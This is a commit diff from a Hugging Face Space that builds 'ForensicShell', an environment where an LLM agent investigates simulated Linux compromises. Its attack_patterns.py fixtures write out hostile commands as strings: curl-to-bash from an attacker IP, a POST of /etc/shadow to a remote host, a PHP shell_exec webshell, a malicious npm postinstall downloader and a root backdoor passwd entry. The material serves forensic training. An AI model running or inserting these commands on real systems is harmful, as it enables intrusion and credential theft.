Spaces:

yashppawar
/

forensic-shell

Sleeping

App Files Files Community

yashppawar commited on Apr 11

Commit

c36ffd2

verified ·

1 Parent(s): 4581fcf

Upload folder using huggingface_hub

Browse files

Files changed (11) hide show

agents/__init__.py +5 -0
agents/llm_policy.py +337 -0
openenv_forensic_shell.egg-info/PKG-INFO +3 -0
openenv_forensic_shell.egg-info/SOURCES.txt +8 -0
openenv_forensic_shell.egg-info/requires.txt +3 -0
pyproject.toml +10 -12
server/attack_patterns.py +288 -0
server/forensic_shell_environment.py +128 -15
server/grader.py +18 -1
server/name_pools.py +62 -0
server/scenario_generator.py +315 -0

agents/__init__.py ADDED Viewed

	@@ -0,0 +1,5 @@

+"""
+Agent policies for ForensicShell. Shared between inference.py (hackathon
+entry point) and rl/rollout.py (training data collector) so both emit
+identical action distributions.
+"""

agents/llm_policy.py ADDED Viewed

	@@ -0,0 +1,337 @@

+"""
+Shared LLM-backed policy.
+Exposes one class, `LLMPolicy`, that wraps an OpenAI-compatible client and
+turns a ForensicShellObservation + episode context into a ForensicShellAction.
+Used by inference.py (baseline submission script) and by rl/rollout.py
+(training data collector). Both call sites share parsing + fallback logic so
+bugs never drift between them.
+The `MockPolicy` class below is a drop-in zero-LLM alternative used when:
+  - Groq / HF Router quota is exhausted
+  - Running in CI (no outbound network)
+  - Doing a quick smoke test
+"""
+from __future__ import annotations
+import json
+import re
+import textwrap
+from dataclasses import dataclass, field
+from typing import Any, Dict, List, Optional, Protocol
+from openai import OpenAI
+from forensic_shell.models import (
+    ForensicReport,
+    ForensicShellAction,
+    ForensicShellObservation,
+    TimelineEvent,
+)
+VALID_PHASES = {"login", "recon", "privesc", "persistence", "exfil"}
+SYSTEM_PROMPT = textwrap.dedent(
+    """
+    You are a digital forensics investigator with shell-like read-only access
+    to a compromised Linux host. Investigate by calling actions and then submit
+    a final ForensicReport.
+    Reply with ONE JSON object per turn, nothing else — no prose, no backticks.
+    Allowed actions:
+      {"action_type": "list_dir",     "path": "/some/dir"}
+      {"action_type": "read_file",    "path": "/some/file", "max_bytes": 2048}
+      {"action_type": "grep",         "pattern": "substring", "path": "/some/file"}
+      {"action_type": "stat",         "path": "/some/file"}
+      {"action_type": "submit_report","report": {
+           "compromised_user": "alice",
+           "initial_ip": "198.51.100.77",
+           "modified_files": ["/etc/passwd", "/usr/local/bin/.sysd"],
+           "backdoor_sha256": "abcdef...",
+           "timeline": [
+               {"phase": "login",       "detail": "ssh from ..."},
+               {"phase": "recon",       "detail": "whoami; id"},
+               {"phase": "privesc",     "detail": "sudo ..."},
+               {"phase": "persistence", "detail": "crontab ..."},
+               {"phase": "exfil",       "detail": "curl POST ..."}
+           ]
+      }}
+    Rules:
+      - Output EXACTLY ONE JSON object. No commentary, no markdown.
+      - Start with list_dir on /var/log and /home to orient yourself.
+      - Read /var/log/auth.log to find the compromised user and source IP.
+      - For medium/hard tasks, also find modified files and use 'stat' to
+        compute the backdoor SHA256 (the stat action returns sha256).
+      - For the hard task, reconstruct the attacker's kill chain as an ordered
+        timeline: login -> recon -> privesc -> persistence -> exfil.
+      - Submit only once you are confident — submit_report ends the episode.
+      - You have a strict step budget; do not waste actions.
+    """
+).strip()
+# ---------------------------------------------------------------------------
+# Action parsing helpers — shared between real and mock policies
+# ---------------------------------------------------------------------------
+def parse_action(raw: str) -> ForensicShellAction:
+    """
+    Robustly parse an LLM reply (or any JSON-ish string) into a
+    ForensicShellAction. On any failure, fall back to a no-op list_dir('/').
+    """
+    if not raw:
+        return ForensicShellAction(action_type="list_dir", path="/")
+    text = raw.strip()
+    # Strip accidental markdown fences
+    if text.startswith("```"):
+        text = text.strip("`")
+        if "\n" in text:
+            text = text.split("\n", 1)[1]
+        text = text.strip("`").strip()
+    # Locate the first {...} block to tolerate leading/trailing prose
+    first, last = text.find("{"), text.rfind("}")
+    if first != -1 and last != -1 and last > first:
+        text = text[first : last + 1]
+    try:
+        data: Dict[str, Any] = json.loads(text)
+    except Exception:
+        return ForensicShellAction(action_type="list_dir", path="/")
+    action_type = data.get("action_type") or data.get("type") or "list_dir"
+    report_obj: Optional[ForensicReport] = None
+    report_data = data.get("report")
+    if isinstance(report_data, dict):
+        tl = report_data.get("timeline") or []
+        clean_tl: List[TimelineEvent] = []
+        for item in tl:
+            if not isinstance(item, dict):
+                continue
+            phase = item.get("phase")
+            if phase in VALID_PHASES:
+                clean_tl.append(TimelineEvent(phase=phase, detail=str(item.get("detail", ""))))
+        try:
+            report_obj = ForensicReport(
+                compromised_user=report_data.get("compromised_user"),
+                initial_ip=report_data.get("initial_ip"),
+                modified_files=list(report_data.get("modified_files") or []),
+                backdoor_sha256=report_data.get("backdoor_sha256"),
+                timeline=clean_tl,
+            )
+        except Exception:
+            report_obj = ForensicReport()
+    try:
+        return ForensicShellAction(
+            action_type=action_type,
+            path=data.get("path"),
+            pattern=data.get("pattern"),
+            max_bytes=int(data.get("max_bytes") or 2048),
+            report=report_obj,
+        )
+    except Exception:
+        return ForensicShellAction(action_type="list_dir", path="/")
+def action_to_str(action: ForensicShellAction) -> str:
+    if action.action_type == "list_dir":
+        return f"list_dir({action.path!r})"
+    if action.action_type == "read_file":
+        return f"read_file({action.path!r},{action.max_bytes})"
+    if action.action_type == "grep":
+        return f"grep({action.pattern!r},{action.path!r})"
+    if action.action_type == "stat":
+        return f"stat({action.path!r})"
+    if action.action_type == "submit_report":
+        return "submit_report(...)"
+    return action.action_type
+# ---------------------------------------------------------------------------
+# Policy protocol
+# ---------------------------------------------------------------------------
+class PolicyProtocol(Protocol):
+    name: str
+    def act(
+        self,
+        observation: ForensicShellObservation,
+        history: List[str],
+        step: int,
+    ) -> ForensicShellAction: ...
+# ---------------------------------------------------------------------------
+# Real LLM-backed policy
+# ---------------------------------------------------------------------------
+@dataclass
+class LLMPolicy:
+    client: OpenAI
+    model: str
+    name: str = "llm"
+    temperature: float = 0.2
+    max_tokens: int = 700
+    system_prompt: str = SYSTEM_PROMPT
+    def _build_user_prompt(
+        self,
+        observation: ForensicShellObservation,
+        history: List[str],
+        step: int,
+    ) -> str:
+        history_block = "\n".join(history[-6:]) if history else "(none yet)"
+        last_output = (observation.output or "")[:1500]
+        return textwrap.dedent(
+            f"""
+            TASK: {observation.task_description}
+            Step: {step}
+            Steps remaining (including this one): {observation.steps_remaining}
+            Last action error: {observation.action_error or "none"}
+            Last action output:
+            ---
+            {last_output}
+            ---
+            Recent history:
+            {history_block}
+            Reply with ONE JSON action object only.
+            """
+        ).strip()
+    def act(
+        self,
+        observation: ForensicShellObservation,
+        history: List[str],
+        step: int,
+    ) -> ForensicShellAction:
+        user_prompt = self._build_user_prompt(observation, history, step)
+        try:
+            completion = self.client.chat.completions.create(
+                model=self.model,
+                messages=[
+                    {"role": "system", "content": self.system_prompt},
+                    {"role": "user", "content": user_prompt},
+                ],
+                temperature=self.temperature,
+                max_tokens=self.max_tokens,
+                stream=False,
+            )
+            raw = (completion.choices[0].message.content or "").strip()
+        except Exception as exc:  # pragma: no cover - network-dependent
+            print(f"[DEBUG] LLMPolicy call failed: {exc}", flush=True)
+            raw = ""
+        return parse_action(raw)
+# ---------------------------------------------------------------------------
+# Mock / heuristic policy — no LLM required
+# ---------------------------------------------------------------------------
+_ACCEPTED_RE = re.compile(
+    r"Accepted (?:password|publickey) for (\S+) from (\S+) port"
+)
+@dataclass
+class MockPolicy:
+    """
+    Rule-based, no-network policy. Follows a fixed investigation recipe and
+    submits based on whatever it observed. Used as a resilient fallback in
+    inference.py when no API key is present and in CI where outbound network
+    is blocked.
+    """
+    name: str = "mock"
+    _plan: List[ForensicShellAction] = field(default_factory=list)
+    _step: int = 0
+    _observed_user: Optional[str] = None
+    _observed_ip: Optional[str] = None
+    _observed_sha: Optional[str] = None
+    _observed_paths: List[str] = field(default_factory=list)
+    def _reset_plan(self) -> None:
+        self._plan = [
+            ForensicShellAction(action_type="list_dir", path="/var/log"),
+            ForensicShellAction(action_type="grep", pattern="Accepted ", path="/var/log/auth.log"),
+            ForensicShellAction(action_type="list_dir", path="/etc/cron.d"),
+            ForensicShellAction(action_type="list_dir", path="/usr/local/bin"),
+            ForensicShellAction(action_type="list_dir", path="/usr/local/sbin"),
+            ForensicShellAction(action_type="list_dir", path="/var/www/html"),
+            ForensicShellAction(action_type="list_dir", path="/tmp/.staging"),
+            ForensicShellAction(action_type="stat", path="/usr/local/bin/.sysd"),
+            ForensicShellAction(action_type="stat", path="/usr/local/sbin/.healthcheck"),
+            ForensicShellAction(action_type="stat", path="/var/www/html/shell.php"),
+            ForensicShellAction(action_type="stat", path="/tmp/.staging/dump.sql"),
+            ForensicShellAction(action_type="stat", path="/etc/cron.d/sysd-sync"),
+        ]
+        self._step = 0
+        self._observed_user = None
+        self._observed_ip = None
+        self._observed_sha = None
+        self._observed_paths = []
+    def _harvest(self, observation: ForensicShellObservation) -> None:
+        out = observation.output or ""
+        # Pull first accepted-login from grep output (prefer non-RFC1918)
+        for line in out.splitlines():
+            m = _ACCEPTED_RE.search(line)
+            if m:
+                user, ip = m.group(1), m.group(2)
+                if not ip.startswith(("10.", "172.16.", "192.168.")):
+                    self._observed_user = user
+                    self._observed_ip = ip
+                    break
+                if self._observed_user is None:
+                    self._observed_user = user
+                    self._observed_ip = ip
+        # Pull sha256 from stat output
+        if "sha256=" in out and self._observed_sha is None:
+            for line in out.splitlines():
+                if line.startswith("sha256="):
+                    self._observed_sha = line.split("=", 1)[1].strip()
+                    # stat line also carries path= — grab it if present
+                    for l2 in out.splitlines():
+                        if l2.startswith("path="):
+                            p = l2.split("=", 1)[1].strip()
+                            if p and p not in self._observed_paths:
+                                self._observed_paths.append(p)
+                    break
+    def _final_submit(self) -> ForensicShellAction:
+        timeline = [
+            TimelineEvent(phase=p, detail="auto")
+            for p in ("login", "recon", "privesc", "persistence", "exfil")
+        ]
+        report = ForensicReport(
+            compromised_user=self._observed_user,
+            initial_ip=self._observed_ip,
+            modified_files=list(self._observed_paths),
+            backdoor_sha256=self._observed_sha,
+            timeline=timeline,
+        )
+        return ForensicShellAction(action_type="submit_report", report=report)
+    def act(
+        self,
+        observation: ForensicShellObservation,
+        history: List[str],
+        step: int,
+    ) -> ForensicShellAction:
+        if step == 1:
+            self._reset_plan()
+        self._harvest(observation)
+        if self._step < len(self._plan):
+            action = self._plan[self._step]
+            self._step += 1
+            return action
+        return self._final_submit()

openenv_forensic_shell.egg-info/PKG-INFO CHANGED Viewed

@@ -4,6 +4,9 @@ Version: 0.1.0
 Summary: Forensic Shell environment for OpenEnv
 Requires-Python: >=3.10
 Requires-Dist: openenv-core[core]>=0.2.2
 Provides-Extra: dev
 Requires-Dist: pytest>=8.0.0; extra == "dev"
 Requires-Dist: pytest-cov>=4.0.0; extra == "dev"

 Summary: Forensic Shell environment for OpenEnv
 Requires-Python: >=3.10
 Requires-Dist: openenv-core[core]>=0.2.2
+Requires-Dist: openai>=1.40.0
 Provides-Extra: dev
 Requires-Dist: pytest>=8.0.0; extra == "dev"
 Requires-Dist: pytest-cov>=4.0.0; extra == "dev"
+Requires-Dist: pytest-asyncio>=0.23.0; extra == "dev"
+Requires-Dist: pytest-socket>=0.7.0; extra == "dev"

openenv_forensic_shell.egg-info/SOURCES.txt CHANGED Viewed

@@ -1,8 +1,13 @@
 README.md
 pyproject.toml
 ./__init__.py
 ./client.py
 ./models.py
 openenv_forensic_shell.egg-info/PKG-INFO
 openenv_forensic_shell.egg-info/SOURCES.txt
 openenv_forensic_shell.egg-info/dependency_links.txt
@@ -11,6 +16,9 @@ openenv_forensic_shell.egg-info/requires.txt
 openenv_forensic_shell.egg-info/top_level.txt
 server/__init__.py
 server/app.py
 server/forensic_shell_environment.py
 server/grader.py
 server/scenarios.py

 README.md
+__init__.py
+client.py
+models.py
 pyproject.toml
 ./__init__.py
 ./client.py
 ./models.py
+agents/__init__.py
+agents/llm_policy.py
 openenv_forensic_shell.egg-info/PKG-INFO
 openenv_forensic_shell.egg-info/SOURCES.txt
 openenv_forensic_shell.egg-info/dependency_links.txt
 openenv_forensic_shell.egg-info/top_level.txt
 server/__init__.py
 server/app.py
+server/attack_patterns.py
 server/forensic_shell_environment.py
 server/grader.py
+server/name_pools.py
+server/scenario_generator.py
 server/scenarios.py

openenv_forensic_shell.egg-info/requires.txt CHANGED Viewed

@@ -1,5 +1,8 @@
 openenv-core[core]>=0.2.2
 [dev]
 pytest>=8.0.0
 pytest-cov>=4.0.0

 openenv-core[core]>=0.2.2
+openai>=1.40.0
 [dev]
 pytest>=8.0.0
 pytest-cov>=4.0.0
+pytest-asyncio>=0.23.0
+pytest-socket>=0.7.0

pyproject.toml CHANGED Viewed

@@ -15,23 +15,17 @@ description = "Forensic Shell environment for OpenEnv"
 requires-python = ">=3.10"
 dependencies = [
     # Core OpenEnv runtime (provides FastAPI server + HTTP client types)
-    # install from github
-    # "openenv-core[core] @ git+https://github.com/meta-pytorch/OpenEnv.git",
     "openenv-core[core]>=0.2.2",
-    # Environment-specific dependencies
-    # Add all dependencies needed for your environment here
-    # Examples:
-    # "numpy>=1.19.0",
-    # "torch>=2.0.0",
-    # "gymnasium>=0.29.0",
-    # "openspiel>=1.0.0",
-    # "smolagents>=1.22.0,<2",
 ]
 [project.optional-dependencies]
 dev = [
     "pytest>=8.0.0",
     "pytest-cov>=4.0.0",
 ]
 [project.scripts]
@@ -41,5 +35,9 @@ server = "forensic_shell.server.app:main"
 [tool.setuptools]
 include-package-data = true
-packages = ["forensic_shell", "forensic_shell.server"]
-package-dir = { "forensic_shell" = ".", "forensic_shell.server" = "server" }

 requires-python = ">=3.10"
 dependencies = [
     # Core OpenEnv runtime (provides FastAPI server + HTTP client types)
     "openenv-core[core]>=0.2.2",
+    # ForensicShell needs the OpenAI client for LLM-backed policies
+    "openai>=1.40.0",
 ]
 [project.optional-dependencies]
 dev = [
     "pytest>=8.0.0",
     "pytest-cov>=4.0.0",
+    "pytest-asyncio>=0.23.0",
+    "pytest-socket>=0.7.0",
 ]
 [project.scripts]
 [tool.setuptools]
 include-package-data = true
+packages = [
+    "forensic_shell",
+    "forensic_shell.server",
+    "forensic_shell.agents",
+]
+package-dir = { "forensic_shell" = ".", "forensic_shell.server" = "server", "forensic_shell.agents" = "agents" }

server/attack_patterns.py ADDED Viewed

	@@ -0,0 +1,288 @@

+"""
+Attack pattern templates used by the scenario generator.
+Each pattern is a callable `build(ctx) -> PatternArtifacts` where `ctx` is a
+SimpleNamespace with fields: rng, user, ip, host, ts_base, backdoor_sha256,
+backdoor_bytes, backdoor_path.
+The callable returns a dict describing:
+  - auth_log_lines:   list[str] appended to /var/log/auth.log
+  - bash_history:     str contents of the compromised user's .bash_history
+  - modified_files:   dict[path, content] — system files changed by the attacker
+  - modified_paths:   list[str] — the subset the grader expects (subset of modified_files)
+  - timeline:         list[dict(phase, detail)] — 5-phase kill chain for hard tier
+  - pattern_tag:      short slug used in task_id
+All timestamps are rendered relative to ctx.ts_base (a datetime) so every log
+looks self-consistent. Nothing here touches global random state.
+"""
+from datetime import timedelta
+def _fmt_ts(ts):
+    return ts.strftime("%b %d %H:%M:%S")
+# ---------------------------------------------------------------------------
+# Pattern 1 — SSH brute force -> wget payload -> cron persistence
+# ---------------------------------------------------------------------------
+def ssh_brute(ctx):
+    user, ip, host = ctx.user, ctx.ip, ctx.host
+    ts = ctx.ts_base
+    auth = [
+        f"{_fmt_ts(ts)} {host} sshd[1811]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(seconds=3))} {host} sshd[1813]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(seconds=7))} {host} sshd[1815]: Failed password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(seconds=11))} {host} sshd[1822]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
+        f"{_fmt_ts(ts + timedelta(minutes=1))} {host} sudo:    {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/bin/cp /tmp/.{ctx.short} /usr/local/bin/.{ctx.short}",
+        f"{_fmt_ts(ts + timedelta(minutes=1, seconds=5))} {host} sudo:    {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /etc/cron.d/{ctx.short}-sync",
+    ]
+    bash = (
+        f"cd /tmp\n"
+        f"wget -q http://{ip}/payload/.{ctx.short}\n"
+        f"chmod +x .{ctx.short}\n"
+        f"sudo cp /tmp/.{ctx.short} /usr/local/bin/.{ctx.short}\n"
+        f"echo '* * * * * root /usr/local/bin/.{ctx.short} >/dev/null 2>&1' | sudo tee -a /etc/cron.d/{ctx.short}-sync\n"
+        f"history -c\n"
+        f"exit\n"
+    )
+    cron_path = f"/etc/cron.d/{ctx.short}-sync"
+    cron_content = (
+        f"# Managed by deploy\n"
+        f"0 3 * * * root /usr/local/sbin/logrotate.sh\n"
+        f"* * * * * root /usr/local/bin/.{ctx.short} >/dev/null 2>&1\n"
+    )
+    passwd_content = (
+        f"root:x:0:0:root:/root:/bin/bash\n"
+        f"{user}:x:1000:1000:{user.title()},,,:/home/{user}:/bin/bash\n"
+        f"sysd:x:0:0:System Daemon,,,:/var/lib/sysd:/bin/bash\n"  # attacker-added backdoor acct
+    )
+    modified_files = {
+        "/etc/passwd": passwd_content,
+        cron_path: cron_content,
+        ctx.backdoor_path: ctx.backdoor_bytes,
+    }
+    timeline = [
+        {"phase": "login", "detail": f"ssh brute -> accepted from {ip}"},
+        {"phase": "recon", "detail": "whoami; id; uname -a"},
+        {"phase": "privesc", "detail": "sudo cp payload to /usr/local/bin"},
+        {"phase": "persistence", "detail": f"cron {cron_path} runs backdoor every minute"},
+        {"phase": "exfil", "detail": f"beacon POST to {ip}/beacon"},
+    ]
+    return dict(
+        pattern_tag="ssh_brute",
+        auth_log_lines=auth,
+        bash_history=bash,
+        modified_files=modified_files,
+        modified_paths=["/etc/passwd", cron_path, ctx.backdoor_path],
+        timeline=timeline,
+    )
+# ---------------------------------------------------------------------------
+# Pattern 2 — stolen SSH key -> authorized_keys backdoor -> bashrc persistence
+# ---------------------------------------------------------------------------
+def ssh_key_theft(ctx):
+    user, ip, host = ctx.user, ctx.ip, ctx.host
+    ts = ctx.ts_base
+    fp = f"SHA256:{''.join(ctx.rng.choices('abcdef0123456789', k=16))}"
+    auth = [
+        f"{_fmt_ts(ts)} {host} sshd[522]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2: RSA {fp}",
+        f"{_fmt_ts(ts + timedelta(seconds=1))} {host} sshd[522]: pam_unix(sshd:session): session opened for user {user} by (uid=0)",
+        f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo:    {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.ssh/authorized_keys",
+        f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo:    {user} : TTY=pts/1 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/tee -a /home/{user}/.bashrc",
+    ]
+    bash = (
+        f"cat ~/.ssh/authorized_keys\n"
+        f"echo 'ssh-rsa AAAAB3NzaC1yc2E... attacker@stolen' >> ~/.ssh/authorized_keys\n"
+        f"echo 'curl -s http://{ip}/tick | bash >/dev/null 2>&1 &' >> ~/.bashrc\n"
+        f"chmod 600 ~/.ssh/authorized_keys\n"
+        f"history -c\n"
+    )
+    authorized_keys = (
+        f"ssh-rsa AAAAB3NzaC1yc2EA...legit-original-key {user}@laptop\n"
+        f"ssh-rsa AAAAB3NzaC1yc2EA...attacker-backdoor attacker@stolen\n"
+    )
+    bashrc = (
+        f"# ~/.bashrc\n"
+        f"alias ll='ls -la'\n"
+        f"export PATH=$PATH:/usr/local/bin\n"
+        f"curl -s http://{ip}/tick | bash >/dev/null 2>&1 &\n"
+    )
+    modified_files = {
+        f"/home/{user}/.ssh/authorized_keys": authorized_keys,
+        f"/home/{user}/.bashrc": bashrc,
+        ctx.backdoor_path: ctx.backdoor_bytes,
+    }
+    timeline = [
+        {"phase": "login", "detail": f"pubkey accepted from {ip} (stolen key)"},
+        {"phase": "recon", "detail": "cat authorized_keys; env"},
+        {"phase": "privesc", "detail": "already had sudo"},
+        {"phase": "persistence", "detail": "append attacker key to authorized_keys and bashrc"},
+        {"phase": "exfil", "detail": f"reverse shell to {ip} on login"},
+    ]
+    return dict(
+        pattern_tag="ssh_key_theft",
+        auth_log_lines=auth,
+        bash_history=bash,
+        modified_files=modified_files,
+        modified_paths=[
+            f"/home/{user}/.ssh/authorized_keys",
+            f"/home/{user}/.bashrc",
+            ctx.backdoor_path,
+        ],
+        timeline=timeline,
+    )
+# ---------------------------------------------------------------------------
+# Pattern 3 — webshell upload -> php drop -> curl exfil
+# ---------------------------------------------------------------------------
+def webshell(ctx):
+    user, ip, host = ctx.user, ctx.ip, ctx.host
+    ts = ctx.ts_base
+    auth = [
+        f"{_fmt_ts(ts)} {host} sshd[3001]: Accepted password for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(minutes=4))} {host} sudo:    {user} : TTY=pts/2 ; PWD=/var/www/html ; USER=www-data ; COMMAND=/usr/bin/vim shell.php",
+    ]
+    bash = (
+        f"curl -sO http://{ip}/shell.php\n"
+        f"sudo mv shell.php /var/www/html/shell.php\n"
+        f"sudo chown www-data:www-data /var/www/html/shell.php\n"
+        f"curl -s http://localhost/shell.php?cmd=id\n"
+        f"curl -X POST -F file=@/etc/shadow http://{ip}/drop\n"
+        f"history -c\n"
+    )
+    webshell_content = (
+        b"<?php if (isset($_GET['cmd'])) { echo shell_exec($_GET['cmd']); } ?>\n"
+    )
+    modified_files = {
+        "/var/www/html/shell.php": webshell_content,
+        ctx.backdoor_path: ctx.backdoor_bytes,
+    }
+    # ensure unique paths
+    if ctx.backdoor_path == "/var/www/html/shell.php":
+        # extremely unlikely but guard anyway
+        modified_files[ctx.backdoor_path] = ctx.backdoor_bytes
+    timeline = [
+        {"phase": "login", "detail": f"ssh from {ip}"},
+        {"phase": "recon", "detail": "ls /var/www/html; id"},
+        {"phase": "privesc", "detail": "sudo mv shell.php; chown www-data"},
+        {"phase": "persistence", "detail": "php webshell at /var/www/html/shell.php"},
+        {"phase": "exfil", "detail": f"curl POST /etc/shadow to {ip}/drop"},
+    ]
+    return dict(
+        pattern_tag="webshell",
+        auth_log_lines=auth,
+        bash_history=bash,
+        modified_files=modified_files,
+        modified_paths=["/var/www/html/shell.php", ctx.backdoor_path],
+        timeline=timeline,
+    )
+# ---------------------------------------------------------------------------
+# Pattern 4 — supply-chain compromised package -> /usr/lib drop
+# ---------------------------------------------------------------------------
+def supply_chain(ctx):
+    user, ip, host = ctx.user, ctx.ip, ctx.host
+    ts = ctx.ts_base
+    pkg = ctx.rng.choice(["leftpad-js", "event-stream", "colors-fix", "pytype-helper"])
+    auth = [
+        f"{_fmt_ts(ts)} {host} sshd[901]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(minutes=3))} {host} sudo:    {user} : TTY=pts/0 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/npm install -g {pkg}",
+    ]
+    bash = (
+        f"npm view {pkg}\n"
+        f"sudo npm install -g {pkg}\n"
+        f"node -e 'require(\"{pkg}\")'\n"
+        f"ls /usr/lib/node_modules/{pkg}/\n"
+        f"history -c\n"
+    )
+    postinstall = (
+        f"// postinstall.js -- dropped by malicious {pkg}\n"
+        "const { exec } = require('child_process');\n"
+        f"exec('curl -s http://{ip}/b -o /tmp/.{ctx.short} && chmod +x /tmp/.{ctx.short} && /tmp/.{ctx.short} &');\n"
+    )
+    modified_files = {
+        f"/usr/lib/node_modules/{pkg}/postinstall.js": postinstall,
+        ctx.backdoor_path: ctx.backdoor_bytes,
+    }
+    timeline = [
+        {"phase": "login", "detail": f"pubkey from {ip}"},
+        {"phase": "recon", "detail": f"npm view {pkg}"},
+        {"phase": "privesc", "detail": f"sudo npm install -g {pkg} runs postinstall as root"},
+        {"phase": "persistence", "detail": f"{pkg} postinstall drops /tmp/.{ctx.short}"},
+        {"phase": "exfil", "detail": f"backdoor beacons to {ip}"},
+    ]
+    return dict(
+        pattern_tag="supply_chain",
+        auth_log_lines=auth,
+        bash_history=bash,
+        modified_files=modified_files,
+        modified_paths=[f"/usr/lib/node_modules/{pkg}/postinstall.js", ctx.backdoor_path],
+        timeline=timeline,
+    )
+# ---------------------------------------------------------------------------
+# Pattern 5 — insider threat: legit user exfiltrates db from internal network
+# ---------------------------------------------------------------------------
+def insider(ctx):
+    user, ip, host = ctx.user, ctx.ip, ctx.host
+    ts = ctx.ts_base
+    # insider uses internal network, not public IP, so override
+    auth = [
+        f"{_fmt_ts(ts)} {host} sshd[415]: Accepted publickey for {user} from {ip} port {ctx.rng.randint(30000, 65000)} ssh2",
+        f"{_fmt_ts(ts + timedelta(minutes=2))} {host} sudo:    {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/mysqldump --all-databases",
+        f"{_fmt_ts(ts + timedelta(minutes=5))} {host} sudo:    {user} : TTY=pts/3 ; PWD=/home/{user} ; USER=root ; COMMAND=/usr/bin/rsync -av /var/lib/mysql/dump.sql /tmp/.staging",
+    ]
+    bash = (
+        f"sudo mysqldump --all-databases > /var/lib/mysql/dump.sql\n"
+        f"sudo rsync -av /var/lib/mysql/dump.sql /tmp/.staging/\n"
+        f"scp /tmp/.staging/dump.sql {user}@laptop.internal:/tmp/\n"
+        f"rm /tmp/.staging/dump.sql\n"
+        f"history -c\n"
+    )
+    dump_content = b"-- MySQL dump (exfiltrated)\nCREATE TABLE users (id INT, email VARCHAR(255));\n"
+    staging_content = b"-- staged copy\n" + dump_content
+    modified_files = {
+        "/var/lib/mysql/dump.sql": dump_content,
+        "/tmp/.staging/dump.sql": staging_content,
+        ctx.backdoor_path: ctx.backdoor_bytes,
+    }
+    timeline = [
+        {"phase": "login", "detail": f"pubkey from internal {ip} (legit creds abused)"},
+        {"phase": "recon", "detail": "ls /var/lib/mysql"},
+        {"phase": "privesc", "detail": "user already had sudo"},
+        {"phase": "persistence", "detail": "staging dir /tmp/.staging persists data"},
+        {"phase": "exfil", "detail": "scp dump.sql to laptop.internal"},
+    ]
+    return dict(
+        pattern_tag="insider",
+        auth_log_lines=auth,
+        bash_history=bash,
+        modified_files=modified_files,
+        modified_paths=[
+            "/var/lib/mysql/dump.sql",
+            "/tmp/.staging/dump.sql",
+            ctx.backdoor_path,
+        ],
+        timeline=timeline,
+    )
+PATTERNS = {
+    "ssh_brute": ssh_brute,
+    "ssh_key_theft": ssh_key_theft,
+    "webshell": webshell,
+    "supply_chain": supply_chain,
+    "insider": insider,
+}

server/forensic_shell_environment.py CHANGED Viewed

@@ -11,11 +11,12 @@ a reward in [0.0, 1.0] on the terminal step.
 import hashlib
 import os
 from typing import Dict, List, Optional, Tuple
 from uuid import uuid4
 from openenv.core.env_server.interfaces import Environment
-from openenv.core.env_server.types import State
 try:
     from ..models import ForensicShellAction, ForensicShellObservation
@@ -24,14 +25,49 @@ except ImportError:
 try:
     from .grader import grade
     from .scenarios import DEFAULT_TASK_ID, SCENARIOS
 except ImportError:
-    from grader import grade
-    from scenarios import DEFAULT_TASK_ID, SCENARIOS
 MAX_STEPS_PER_EPISODE = 30
 def _as_bytes(content) -> bytes:
     if isinstance(content, bytes):
@@ -68,22 +104,47 @@ class ForensicShellEnvironment(Environment):
         self._fs: Dict[str, object] = {}
         self._done: bool = False
         self._steps_used: int = 0
     # ---- episode lifecycle ---------------------------------------------------
     def reset(
-        self, task_id: Optional[str] = None, **kwargs
     ) -> ForensicShellObservation:
-        env_task = os.getenv("FORENSIC_TASK_ID")
-        chosen = task_id or env_task or DEFAULT_TASK_ID
-        if chosen not in SCENARIOS:
-            chosen = DEFAULT_TASK_ID
-        self._task_id = chosen
-        self._scenario = SCENARIOS[chosen]
         self._fs = dict(self._scenario["filesystem"])
         self._done = False
         self._steps_used = 0
         self._state = State(episode_id=str(uuid4()), step_count=0)
         return ForensicShellObservation(
@@ -142,12 +203,16 @@ class ForensicShellEnvironment(Environment):
                 return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
             if verb == "read_file":
-                out, err = self._do_read_file(action.path or "", action.max_bytes or 2048)
-                return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
             if verb == "grep":
-                out, err = self._do_grep(action.pattern or "", action.path or "")
-                return self._obs(output=out, steps_remaining=steps_remaining, error=err, done=False, reward=0.0)
             if verb == "stat":
                 out, err = self._do_stat(action.path or "")
@@ -173,6 +238,25 @@ class ForensicShellEnvironment(Environment):
                 reward=0.0,
             )
     # ---- action primitives ---------------------------------------------------
     def _do_list_dir(self, path: str) -> Tuple[str, Optional[str]]:
@@ -284,8 +368,37 @@ class ForensicShellEnvironment(Environment):
             metadata=meta,
         )
-    # ---- state property ------------------------------------------------------
     @property
     def state(self) -> State:
         return self._state

 import hashlib
 import os
+from pathlib import Path
 from typing import Dict, List, Optional, Tuple
 from uuid import uuid4
 from openenv.core.env_server.interfaces import Environment
+from openenv.core.env_server.types import EnvironmentMetadata, State
 try:
     from ..models import ForensicShellAction, ForensicShellObservation
 try:
     from .grader import grade
+    from .scenario_generator import generate_scenario
     from .scenarios import DEFAULT_TASK_ID, SCENARIOS
 except ImportError:
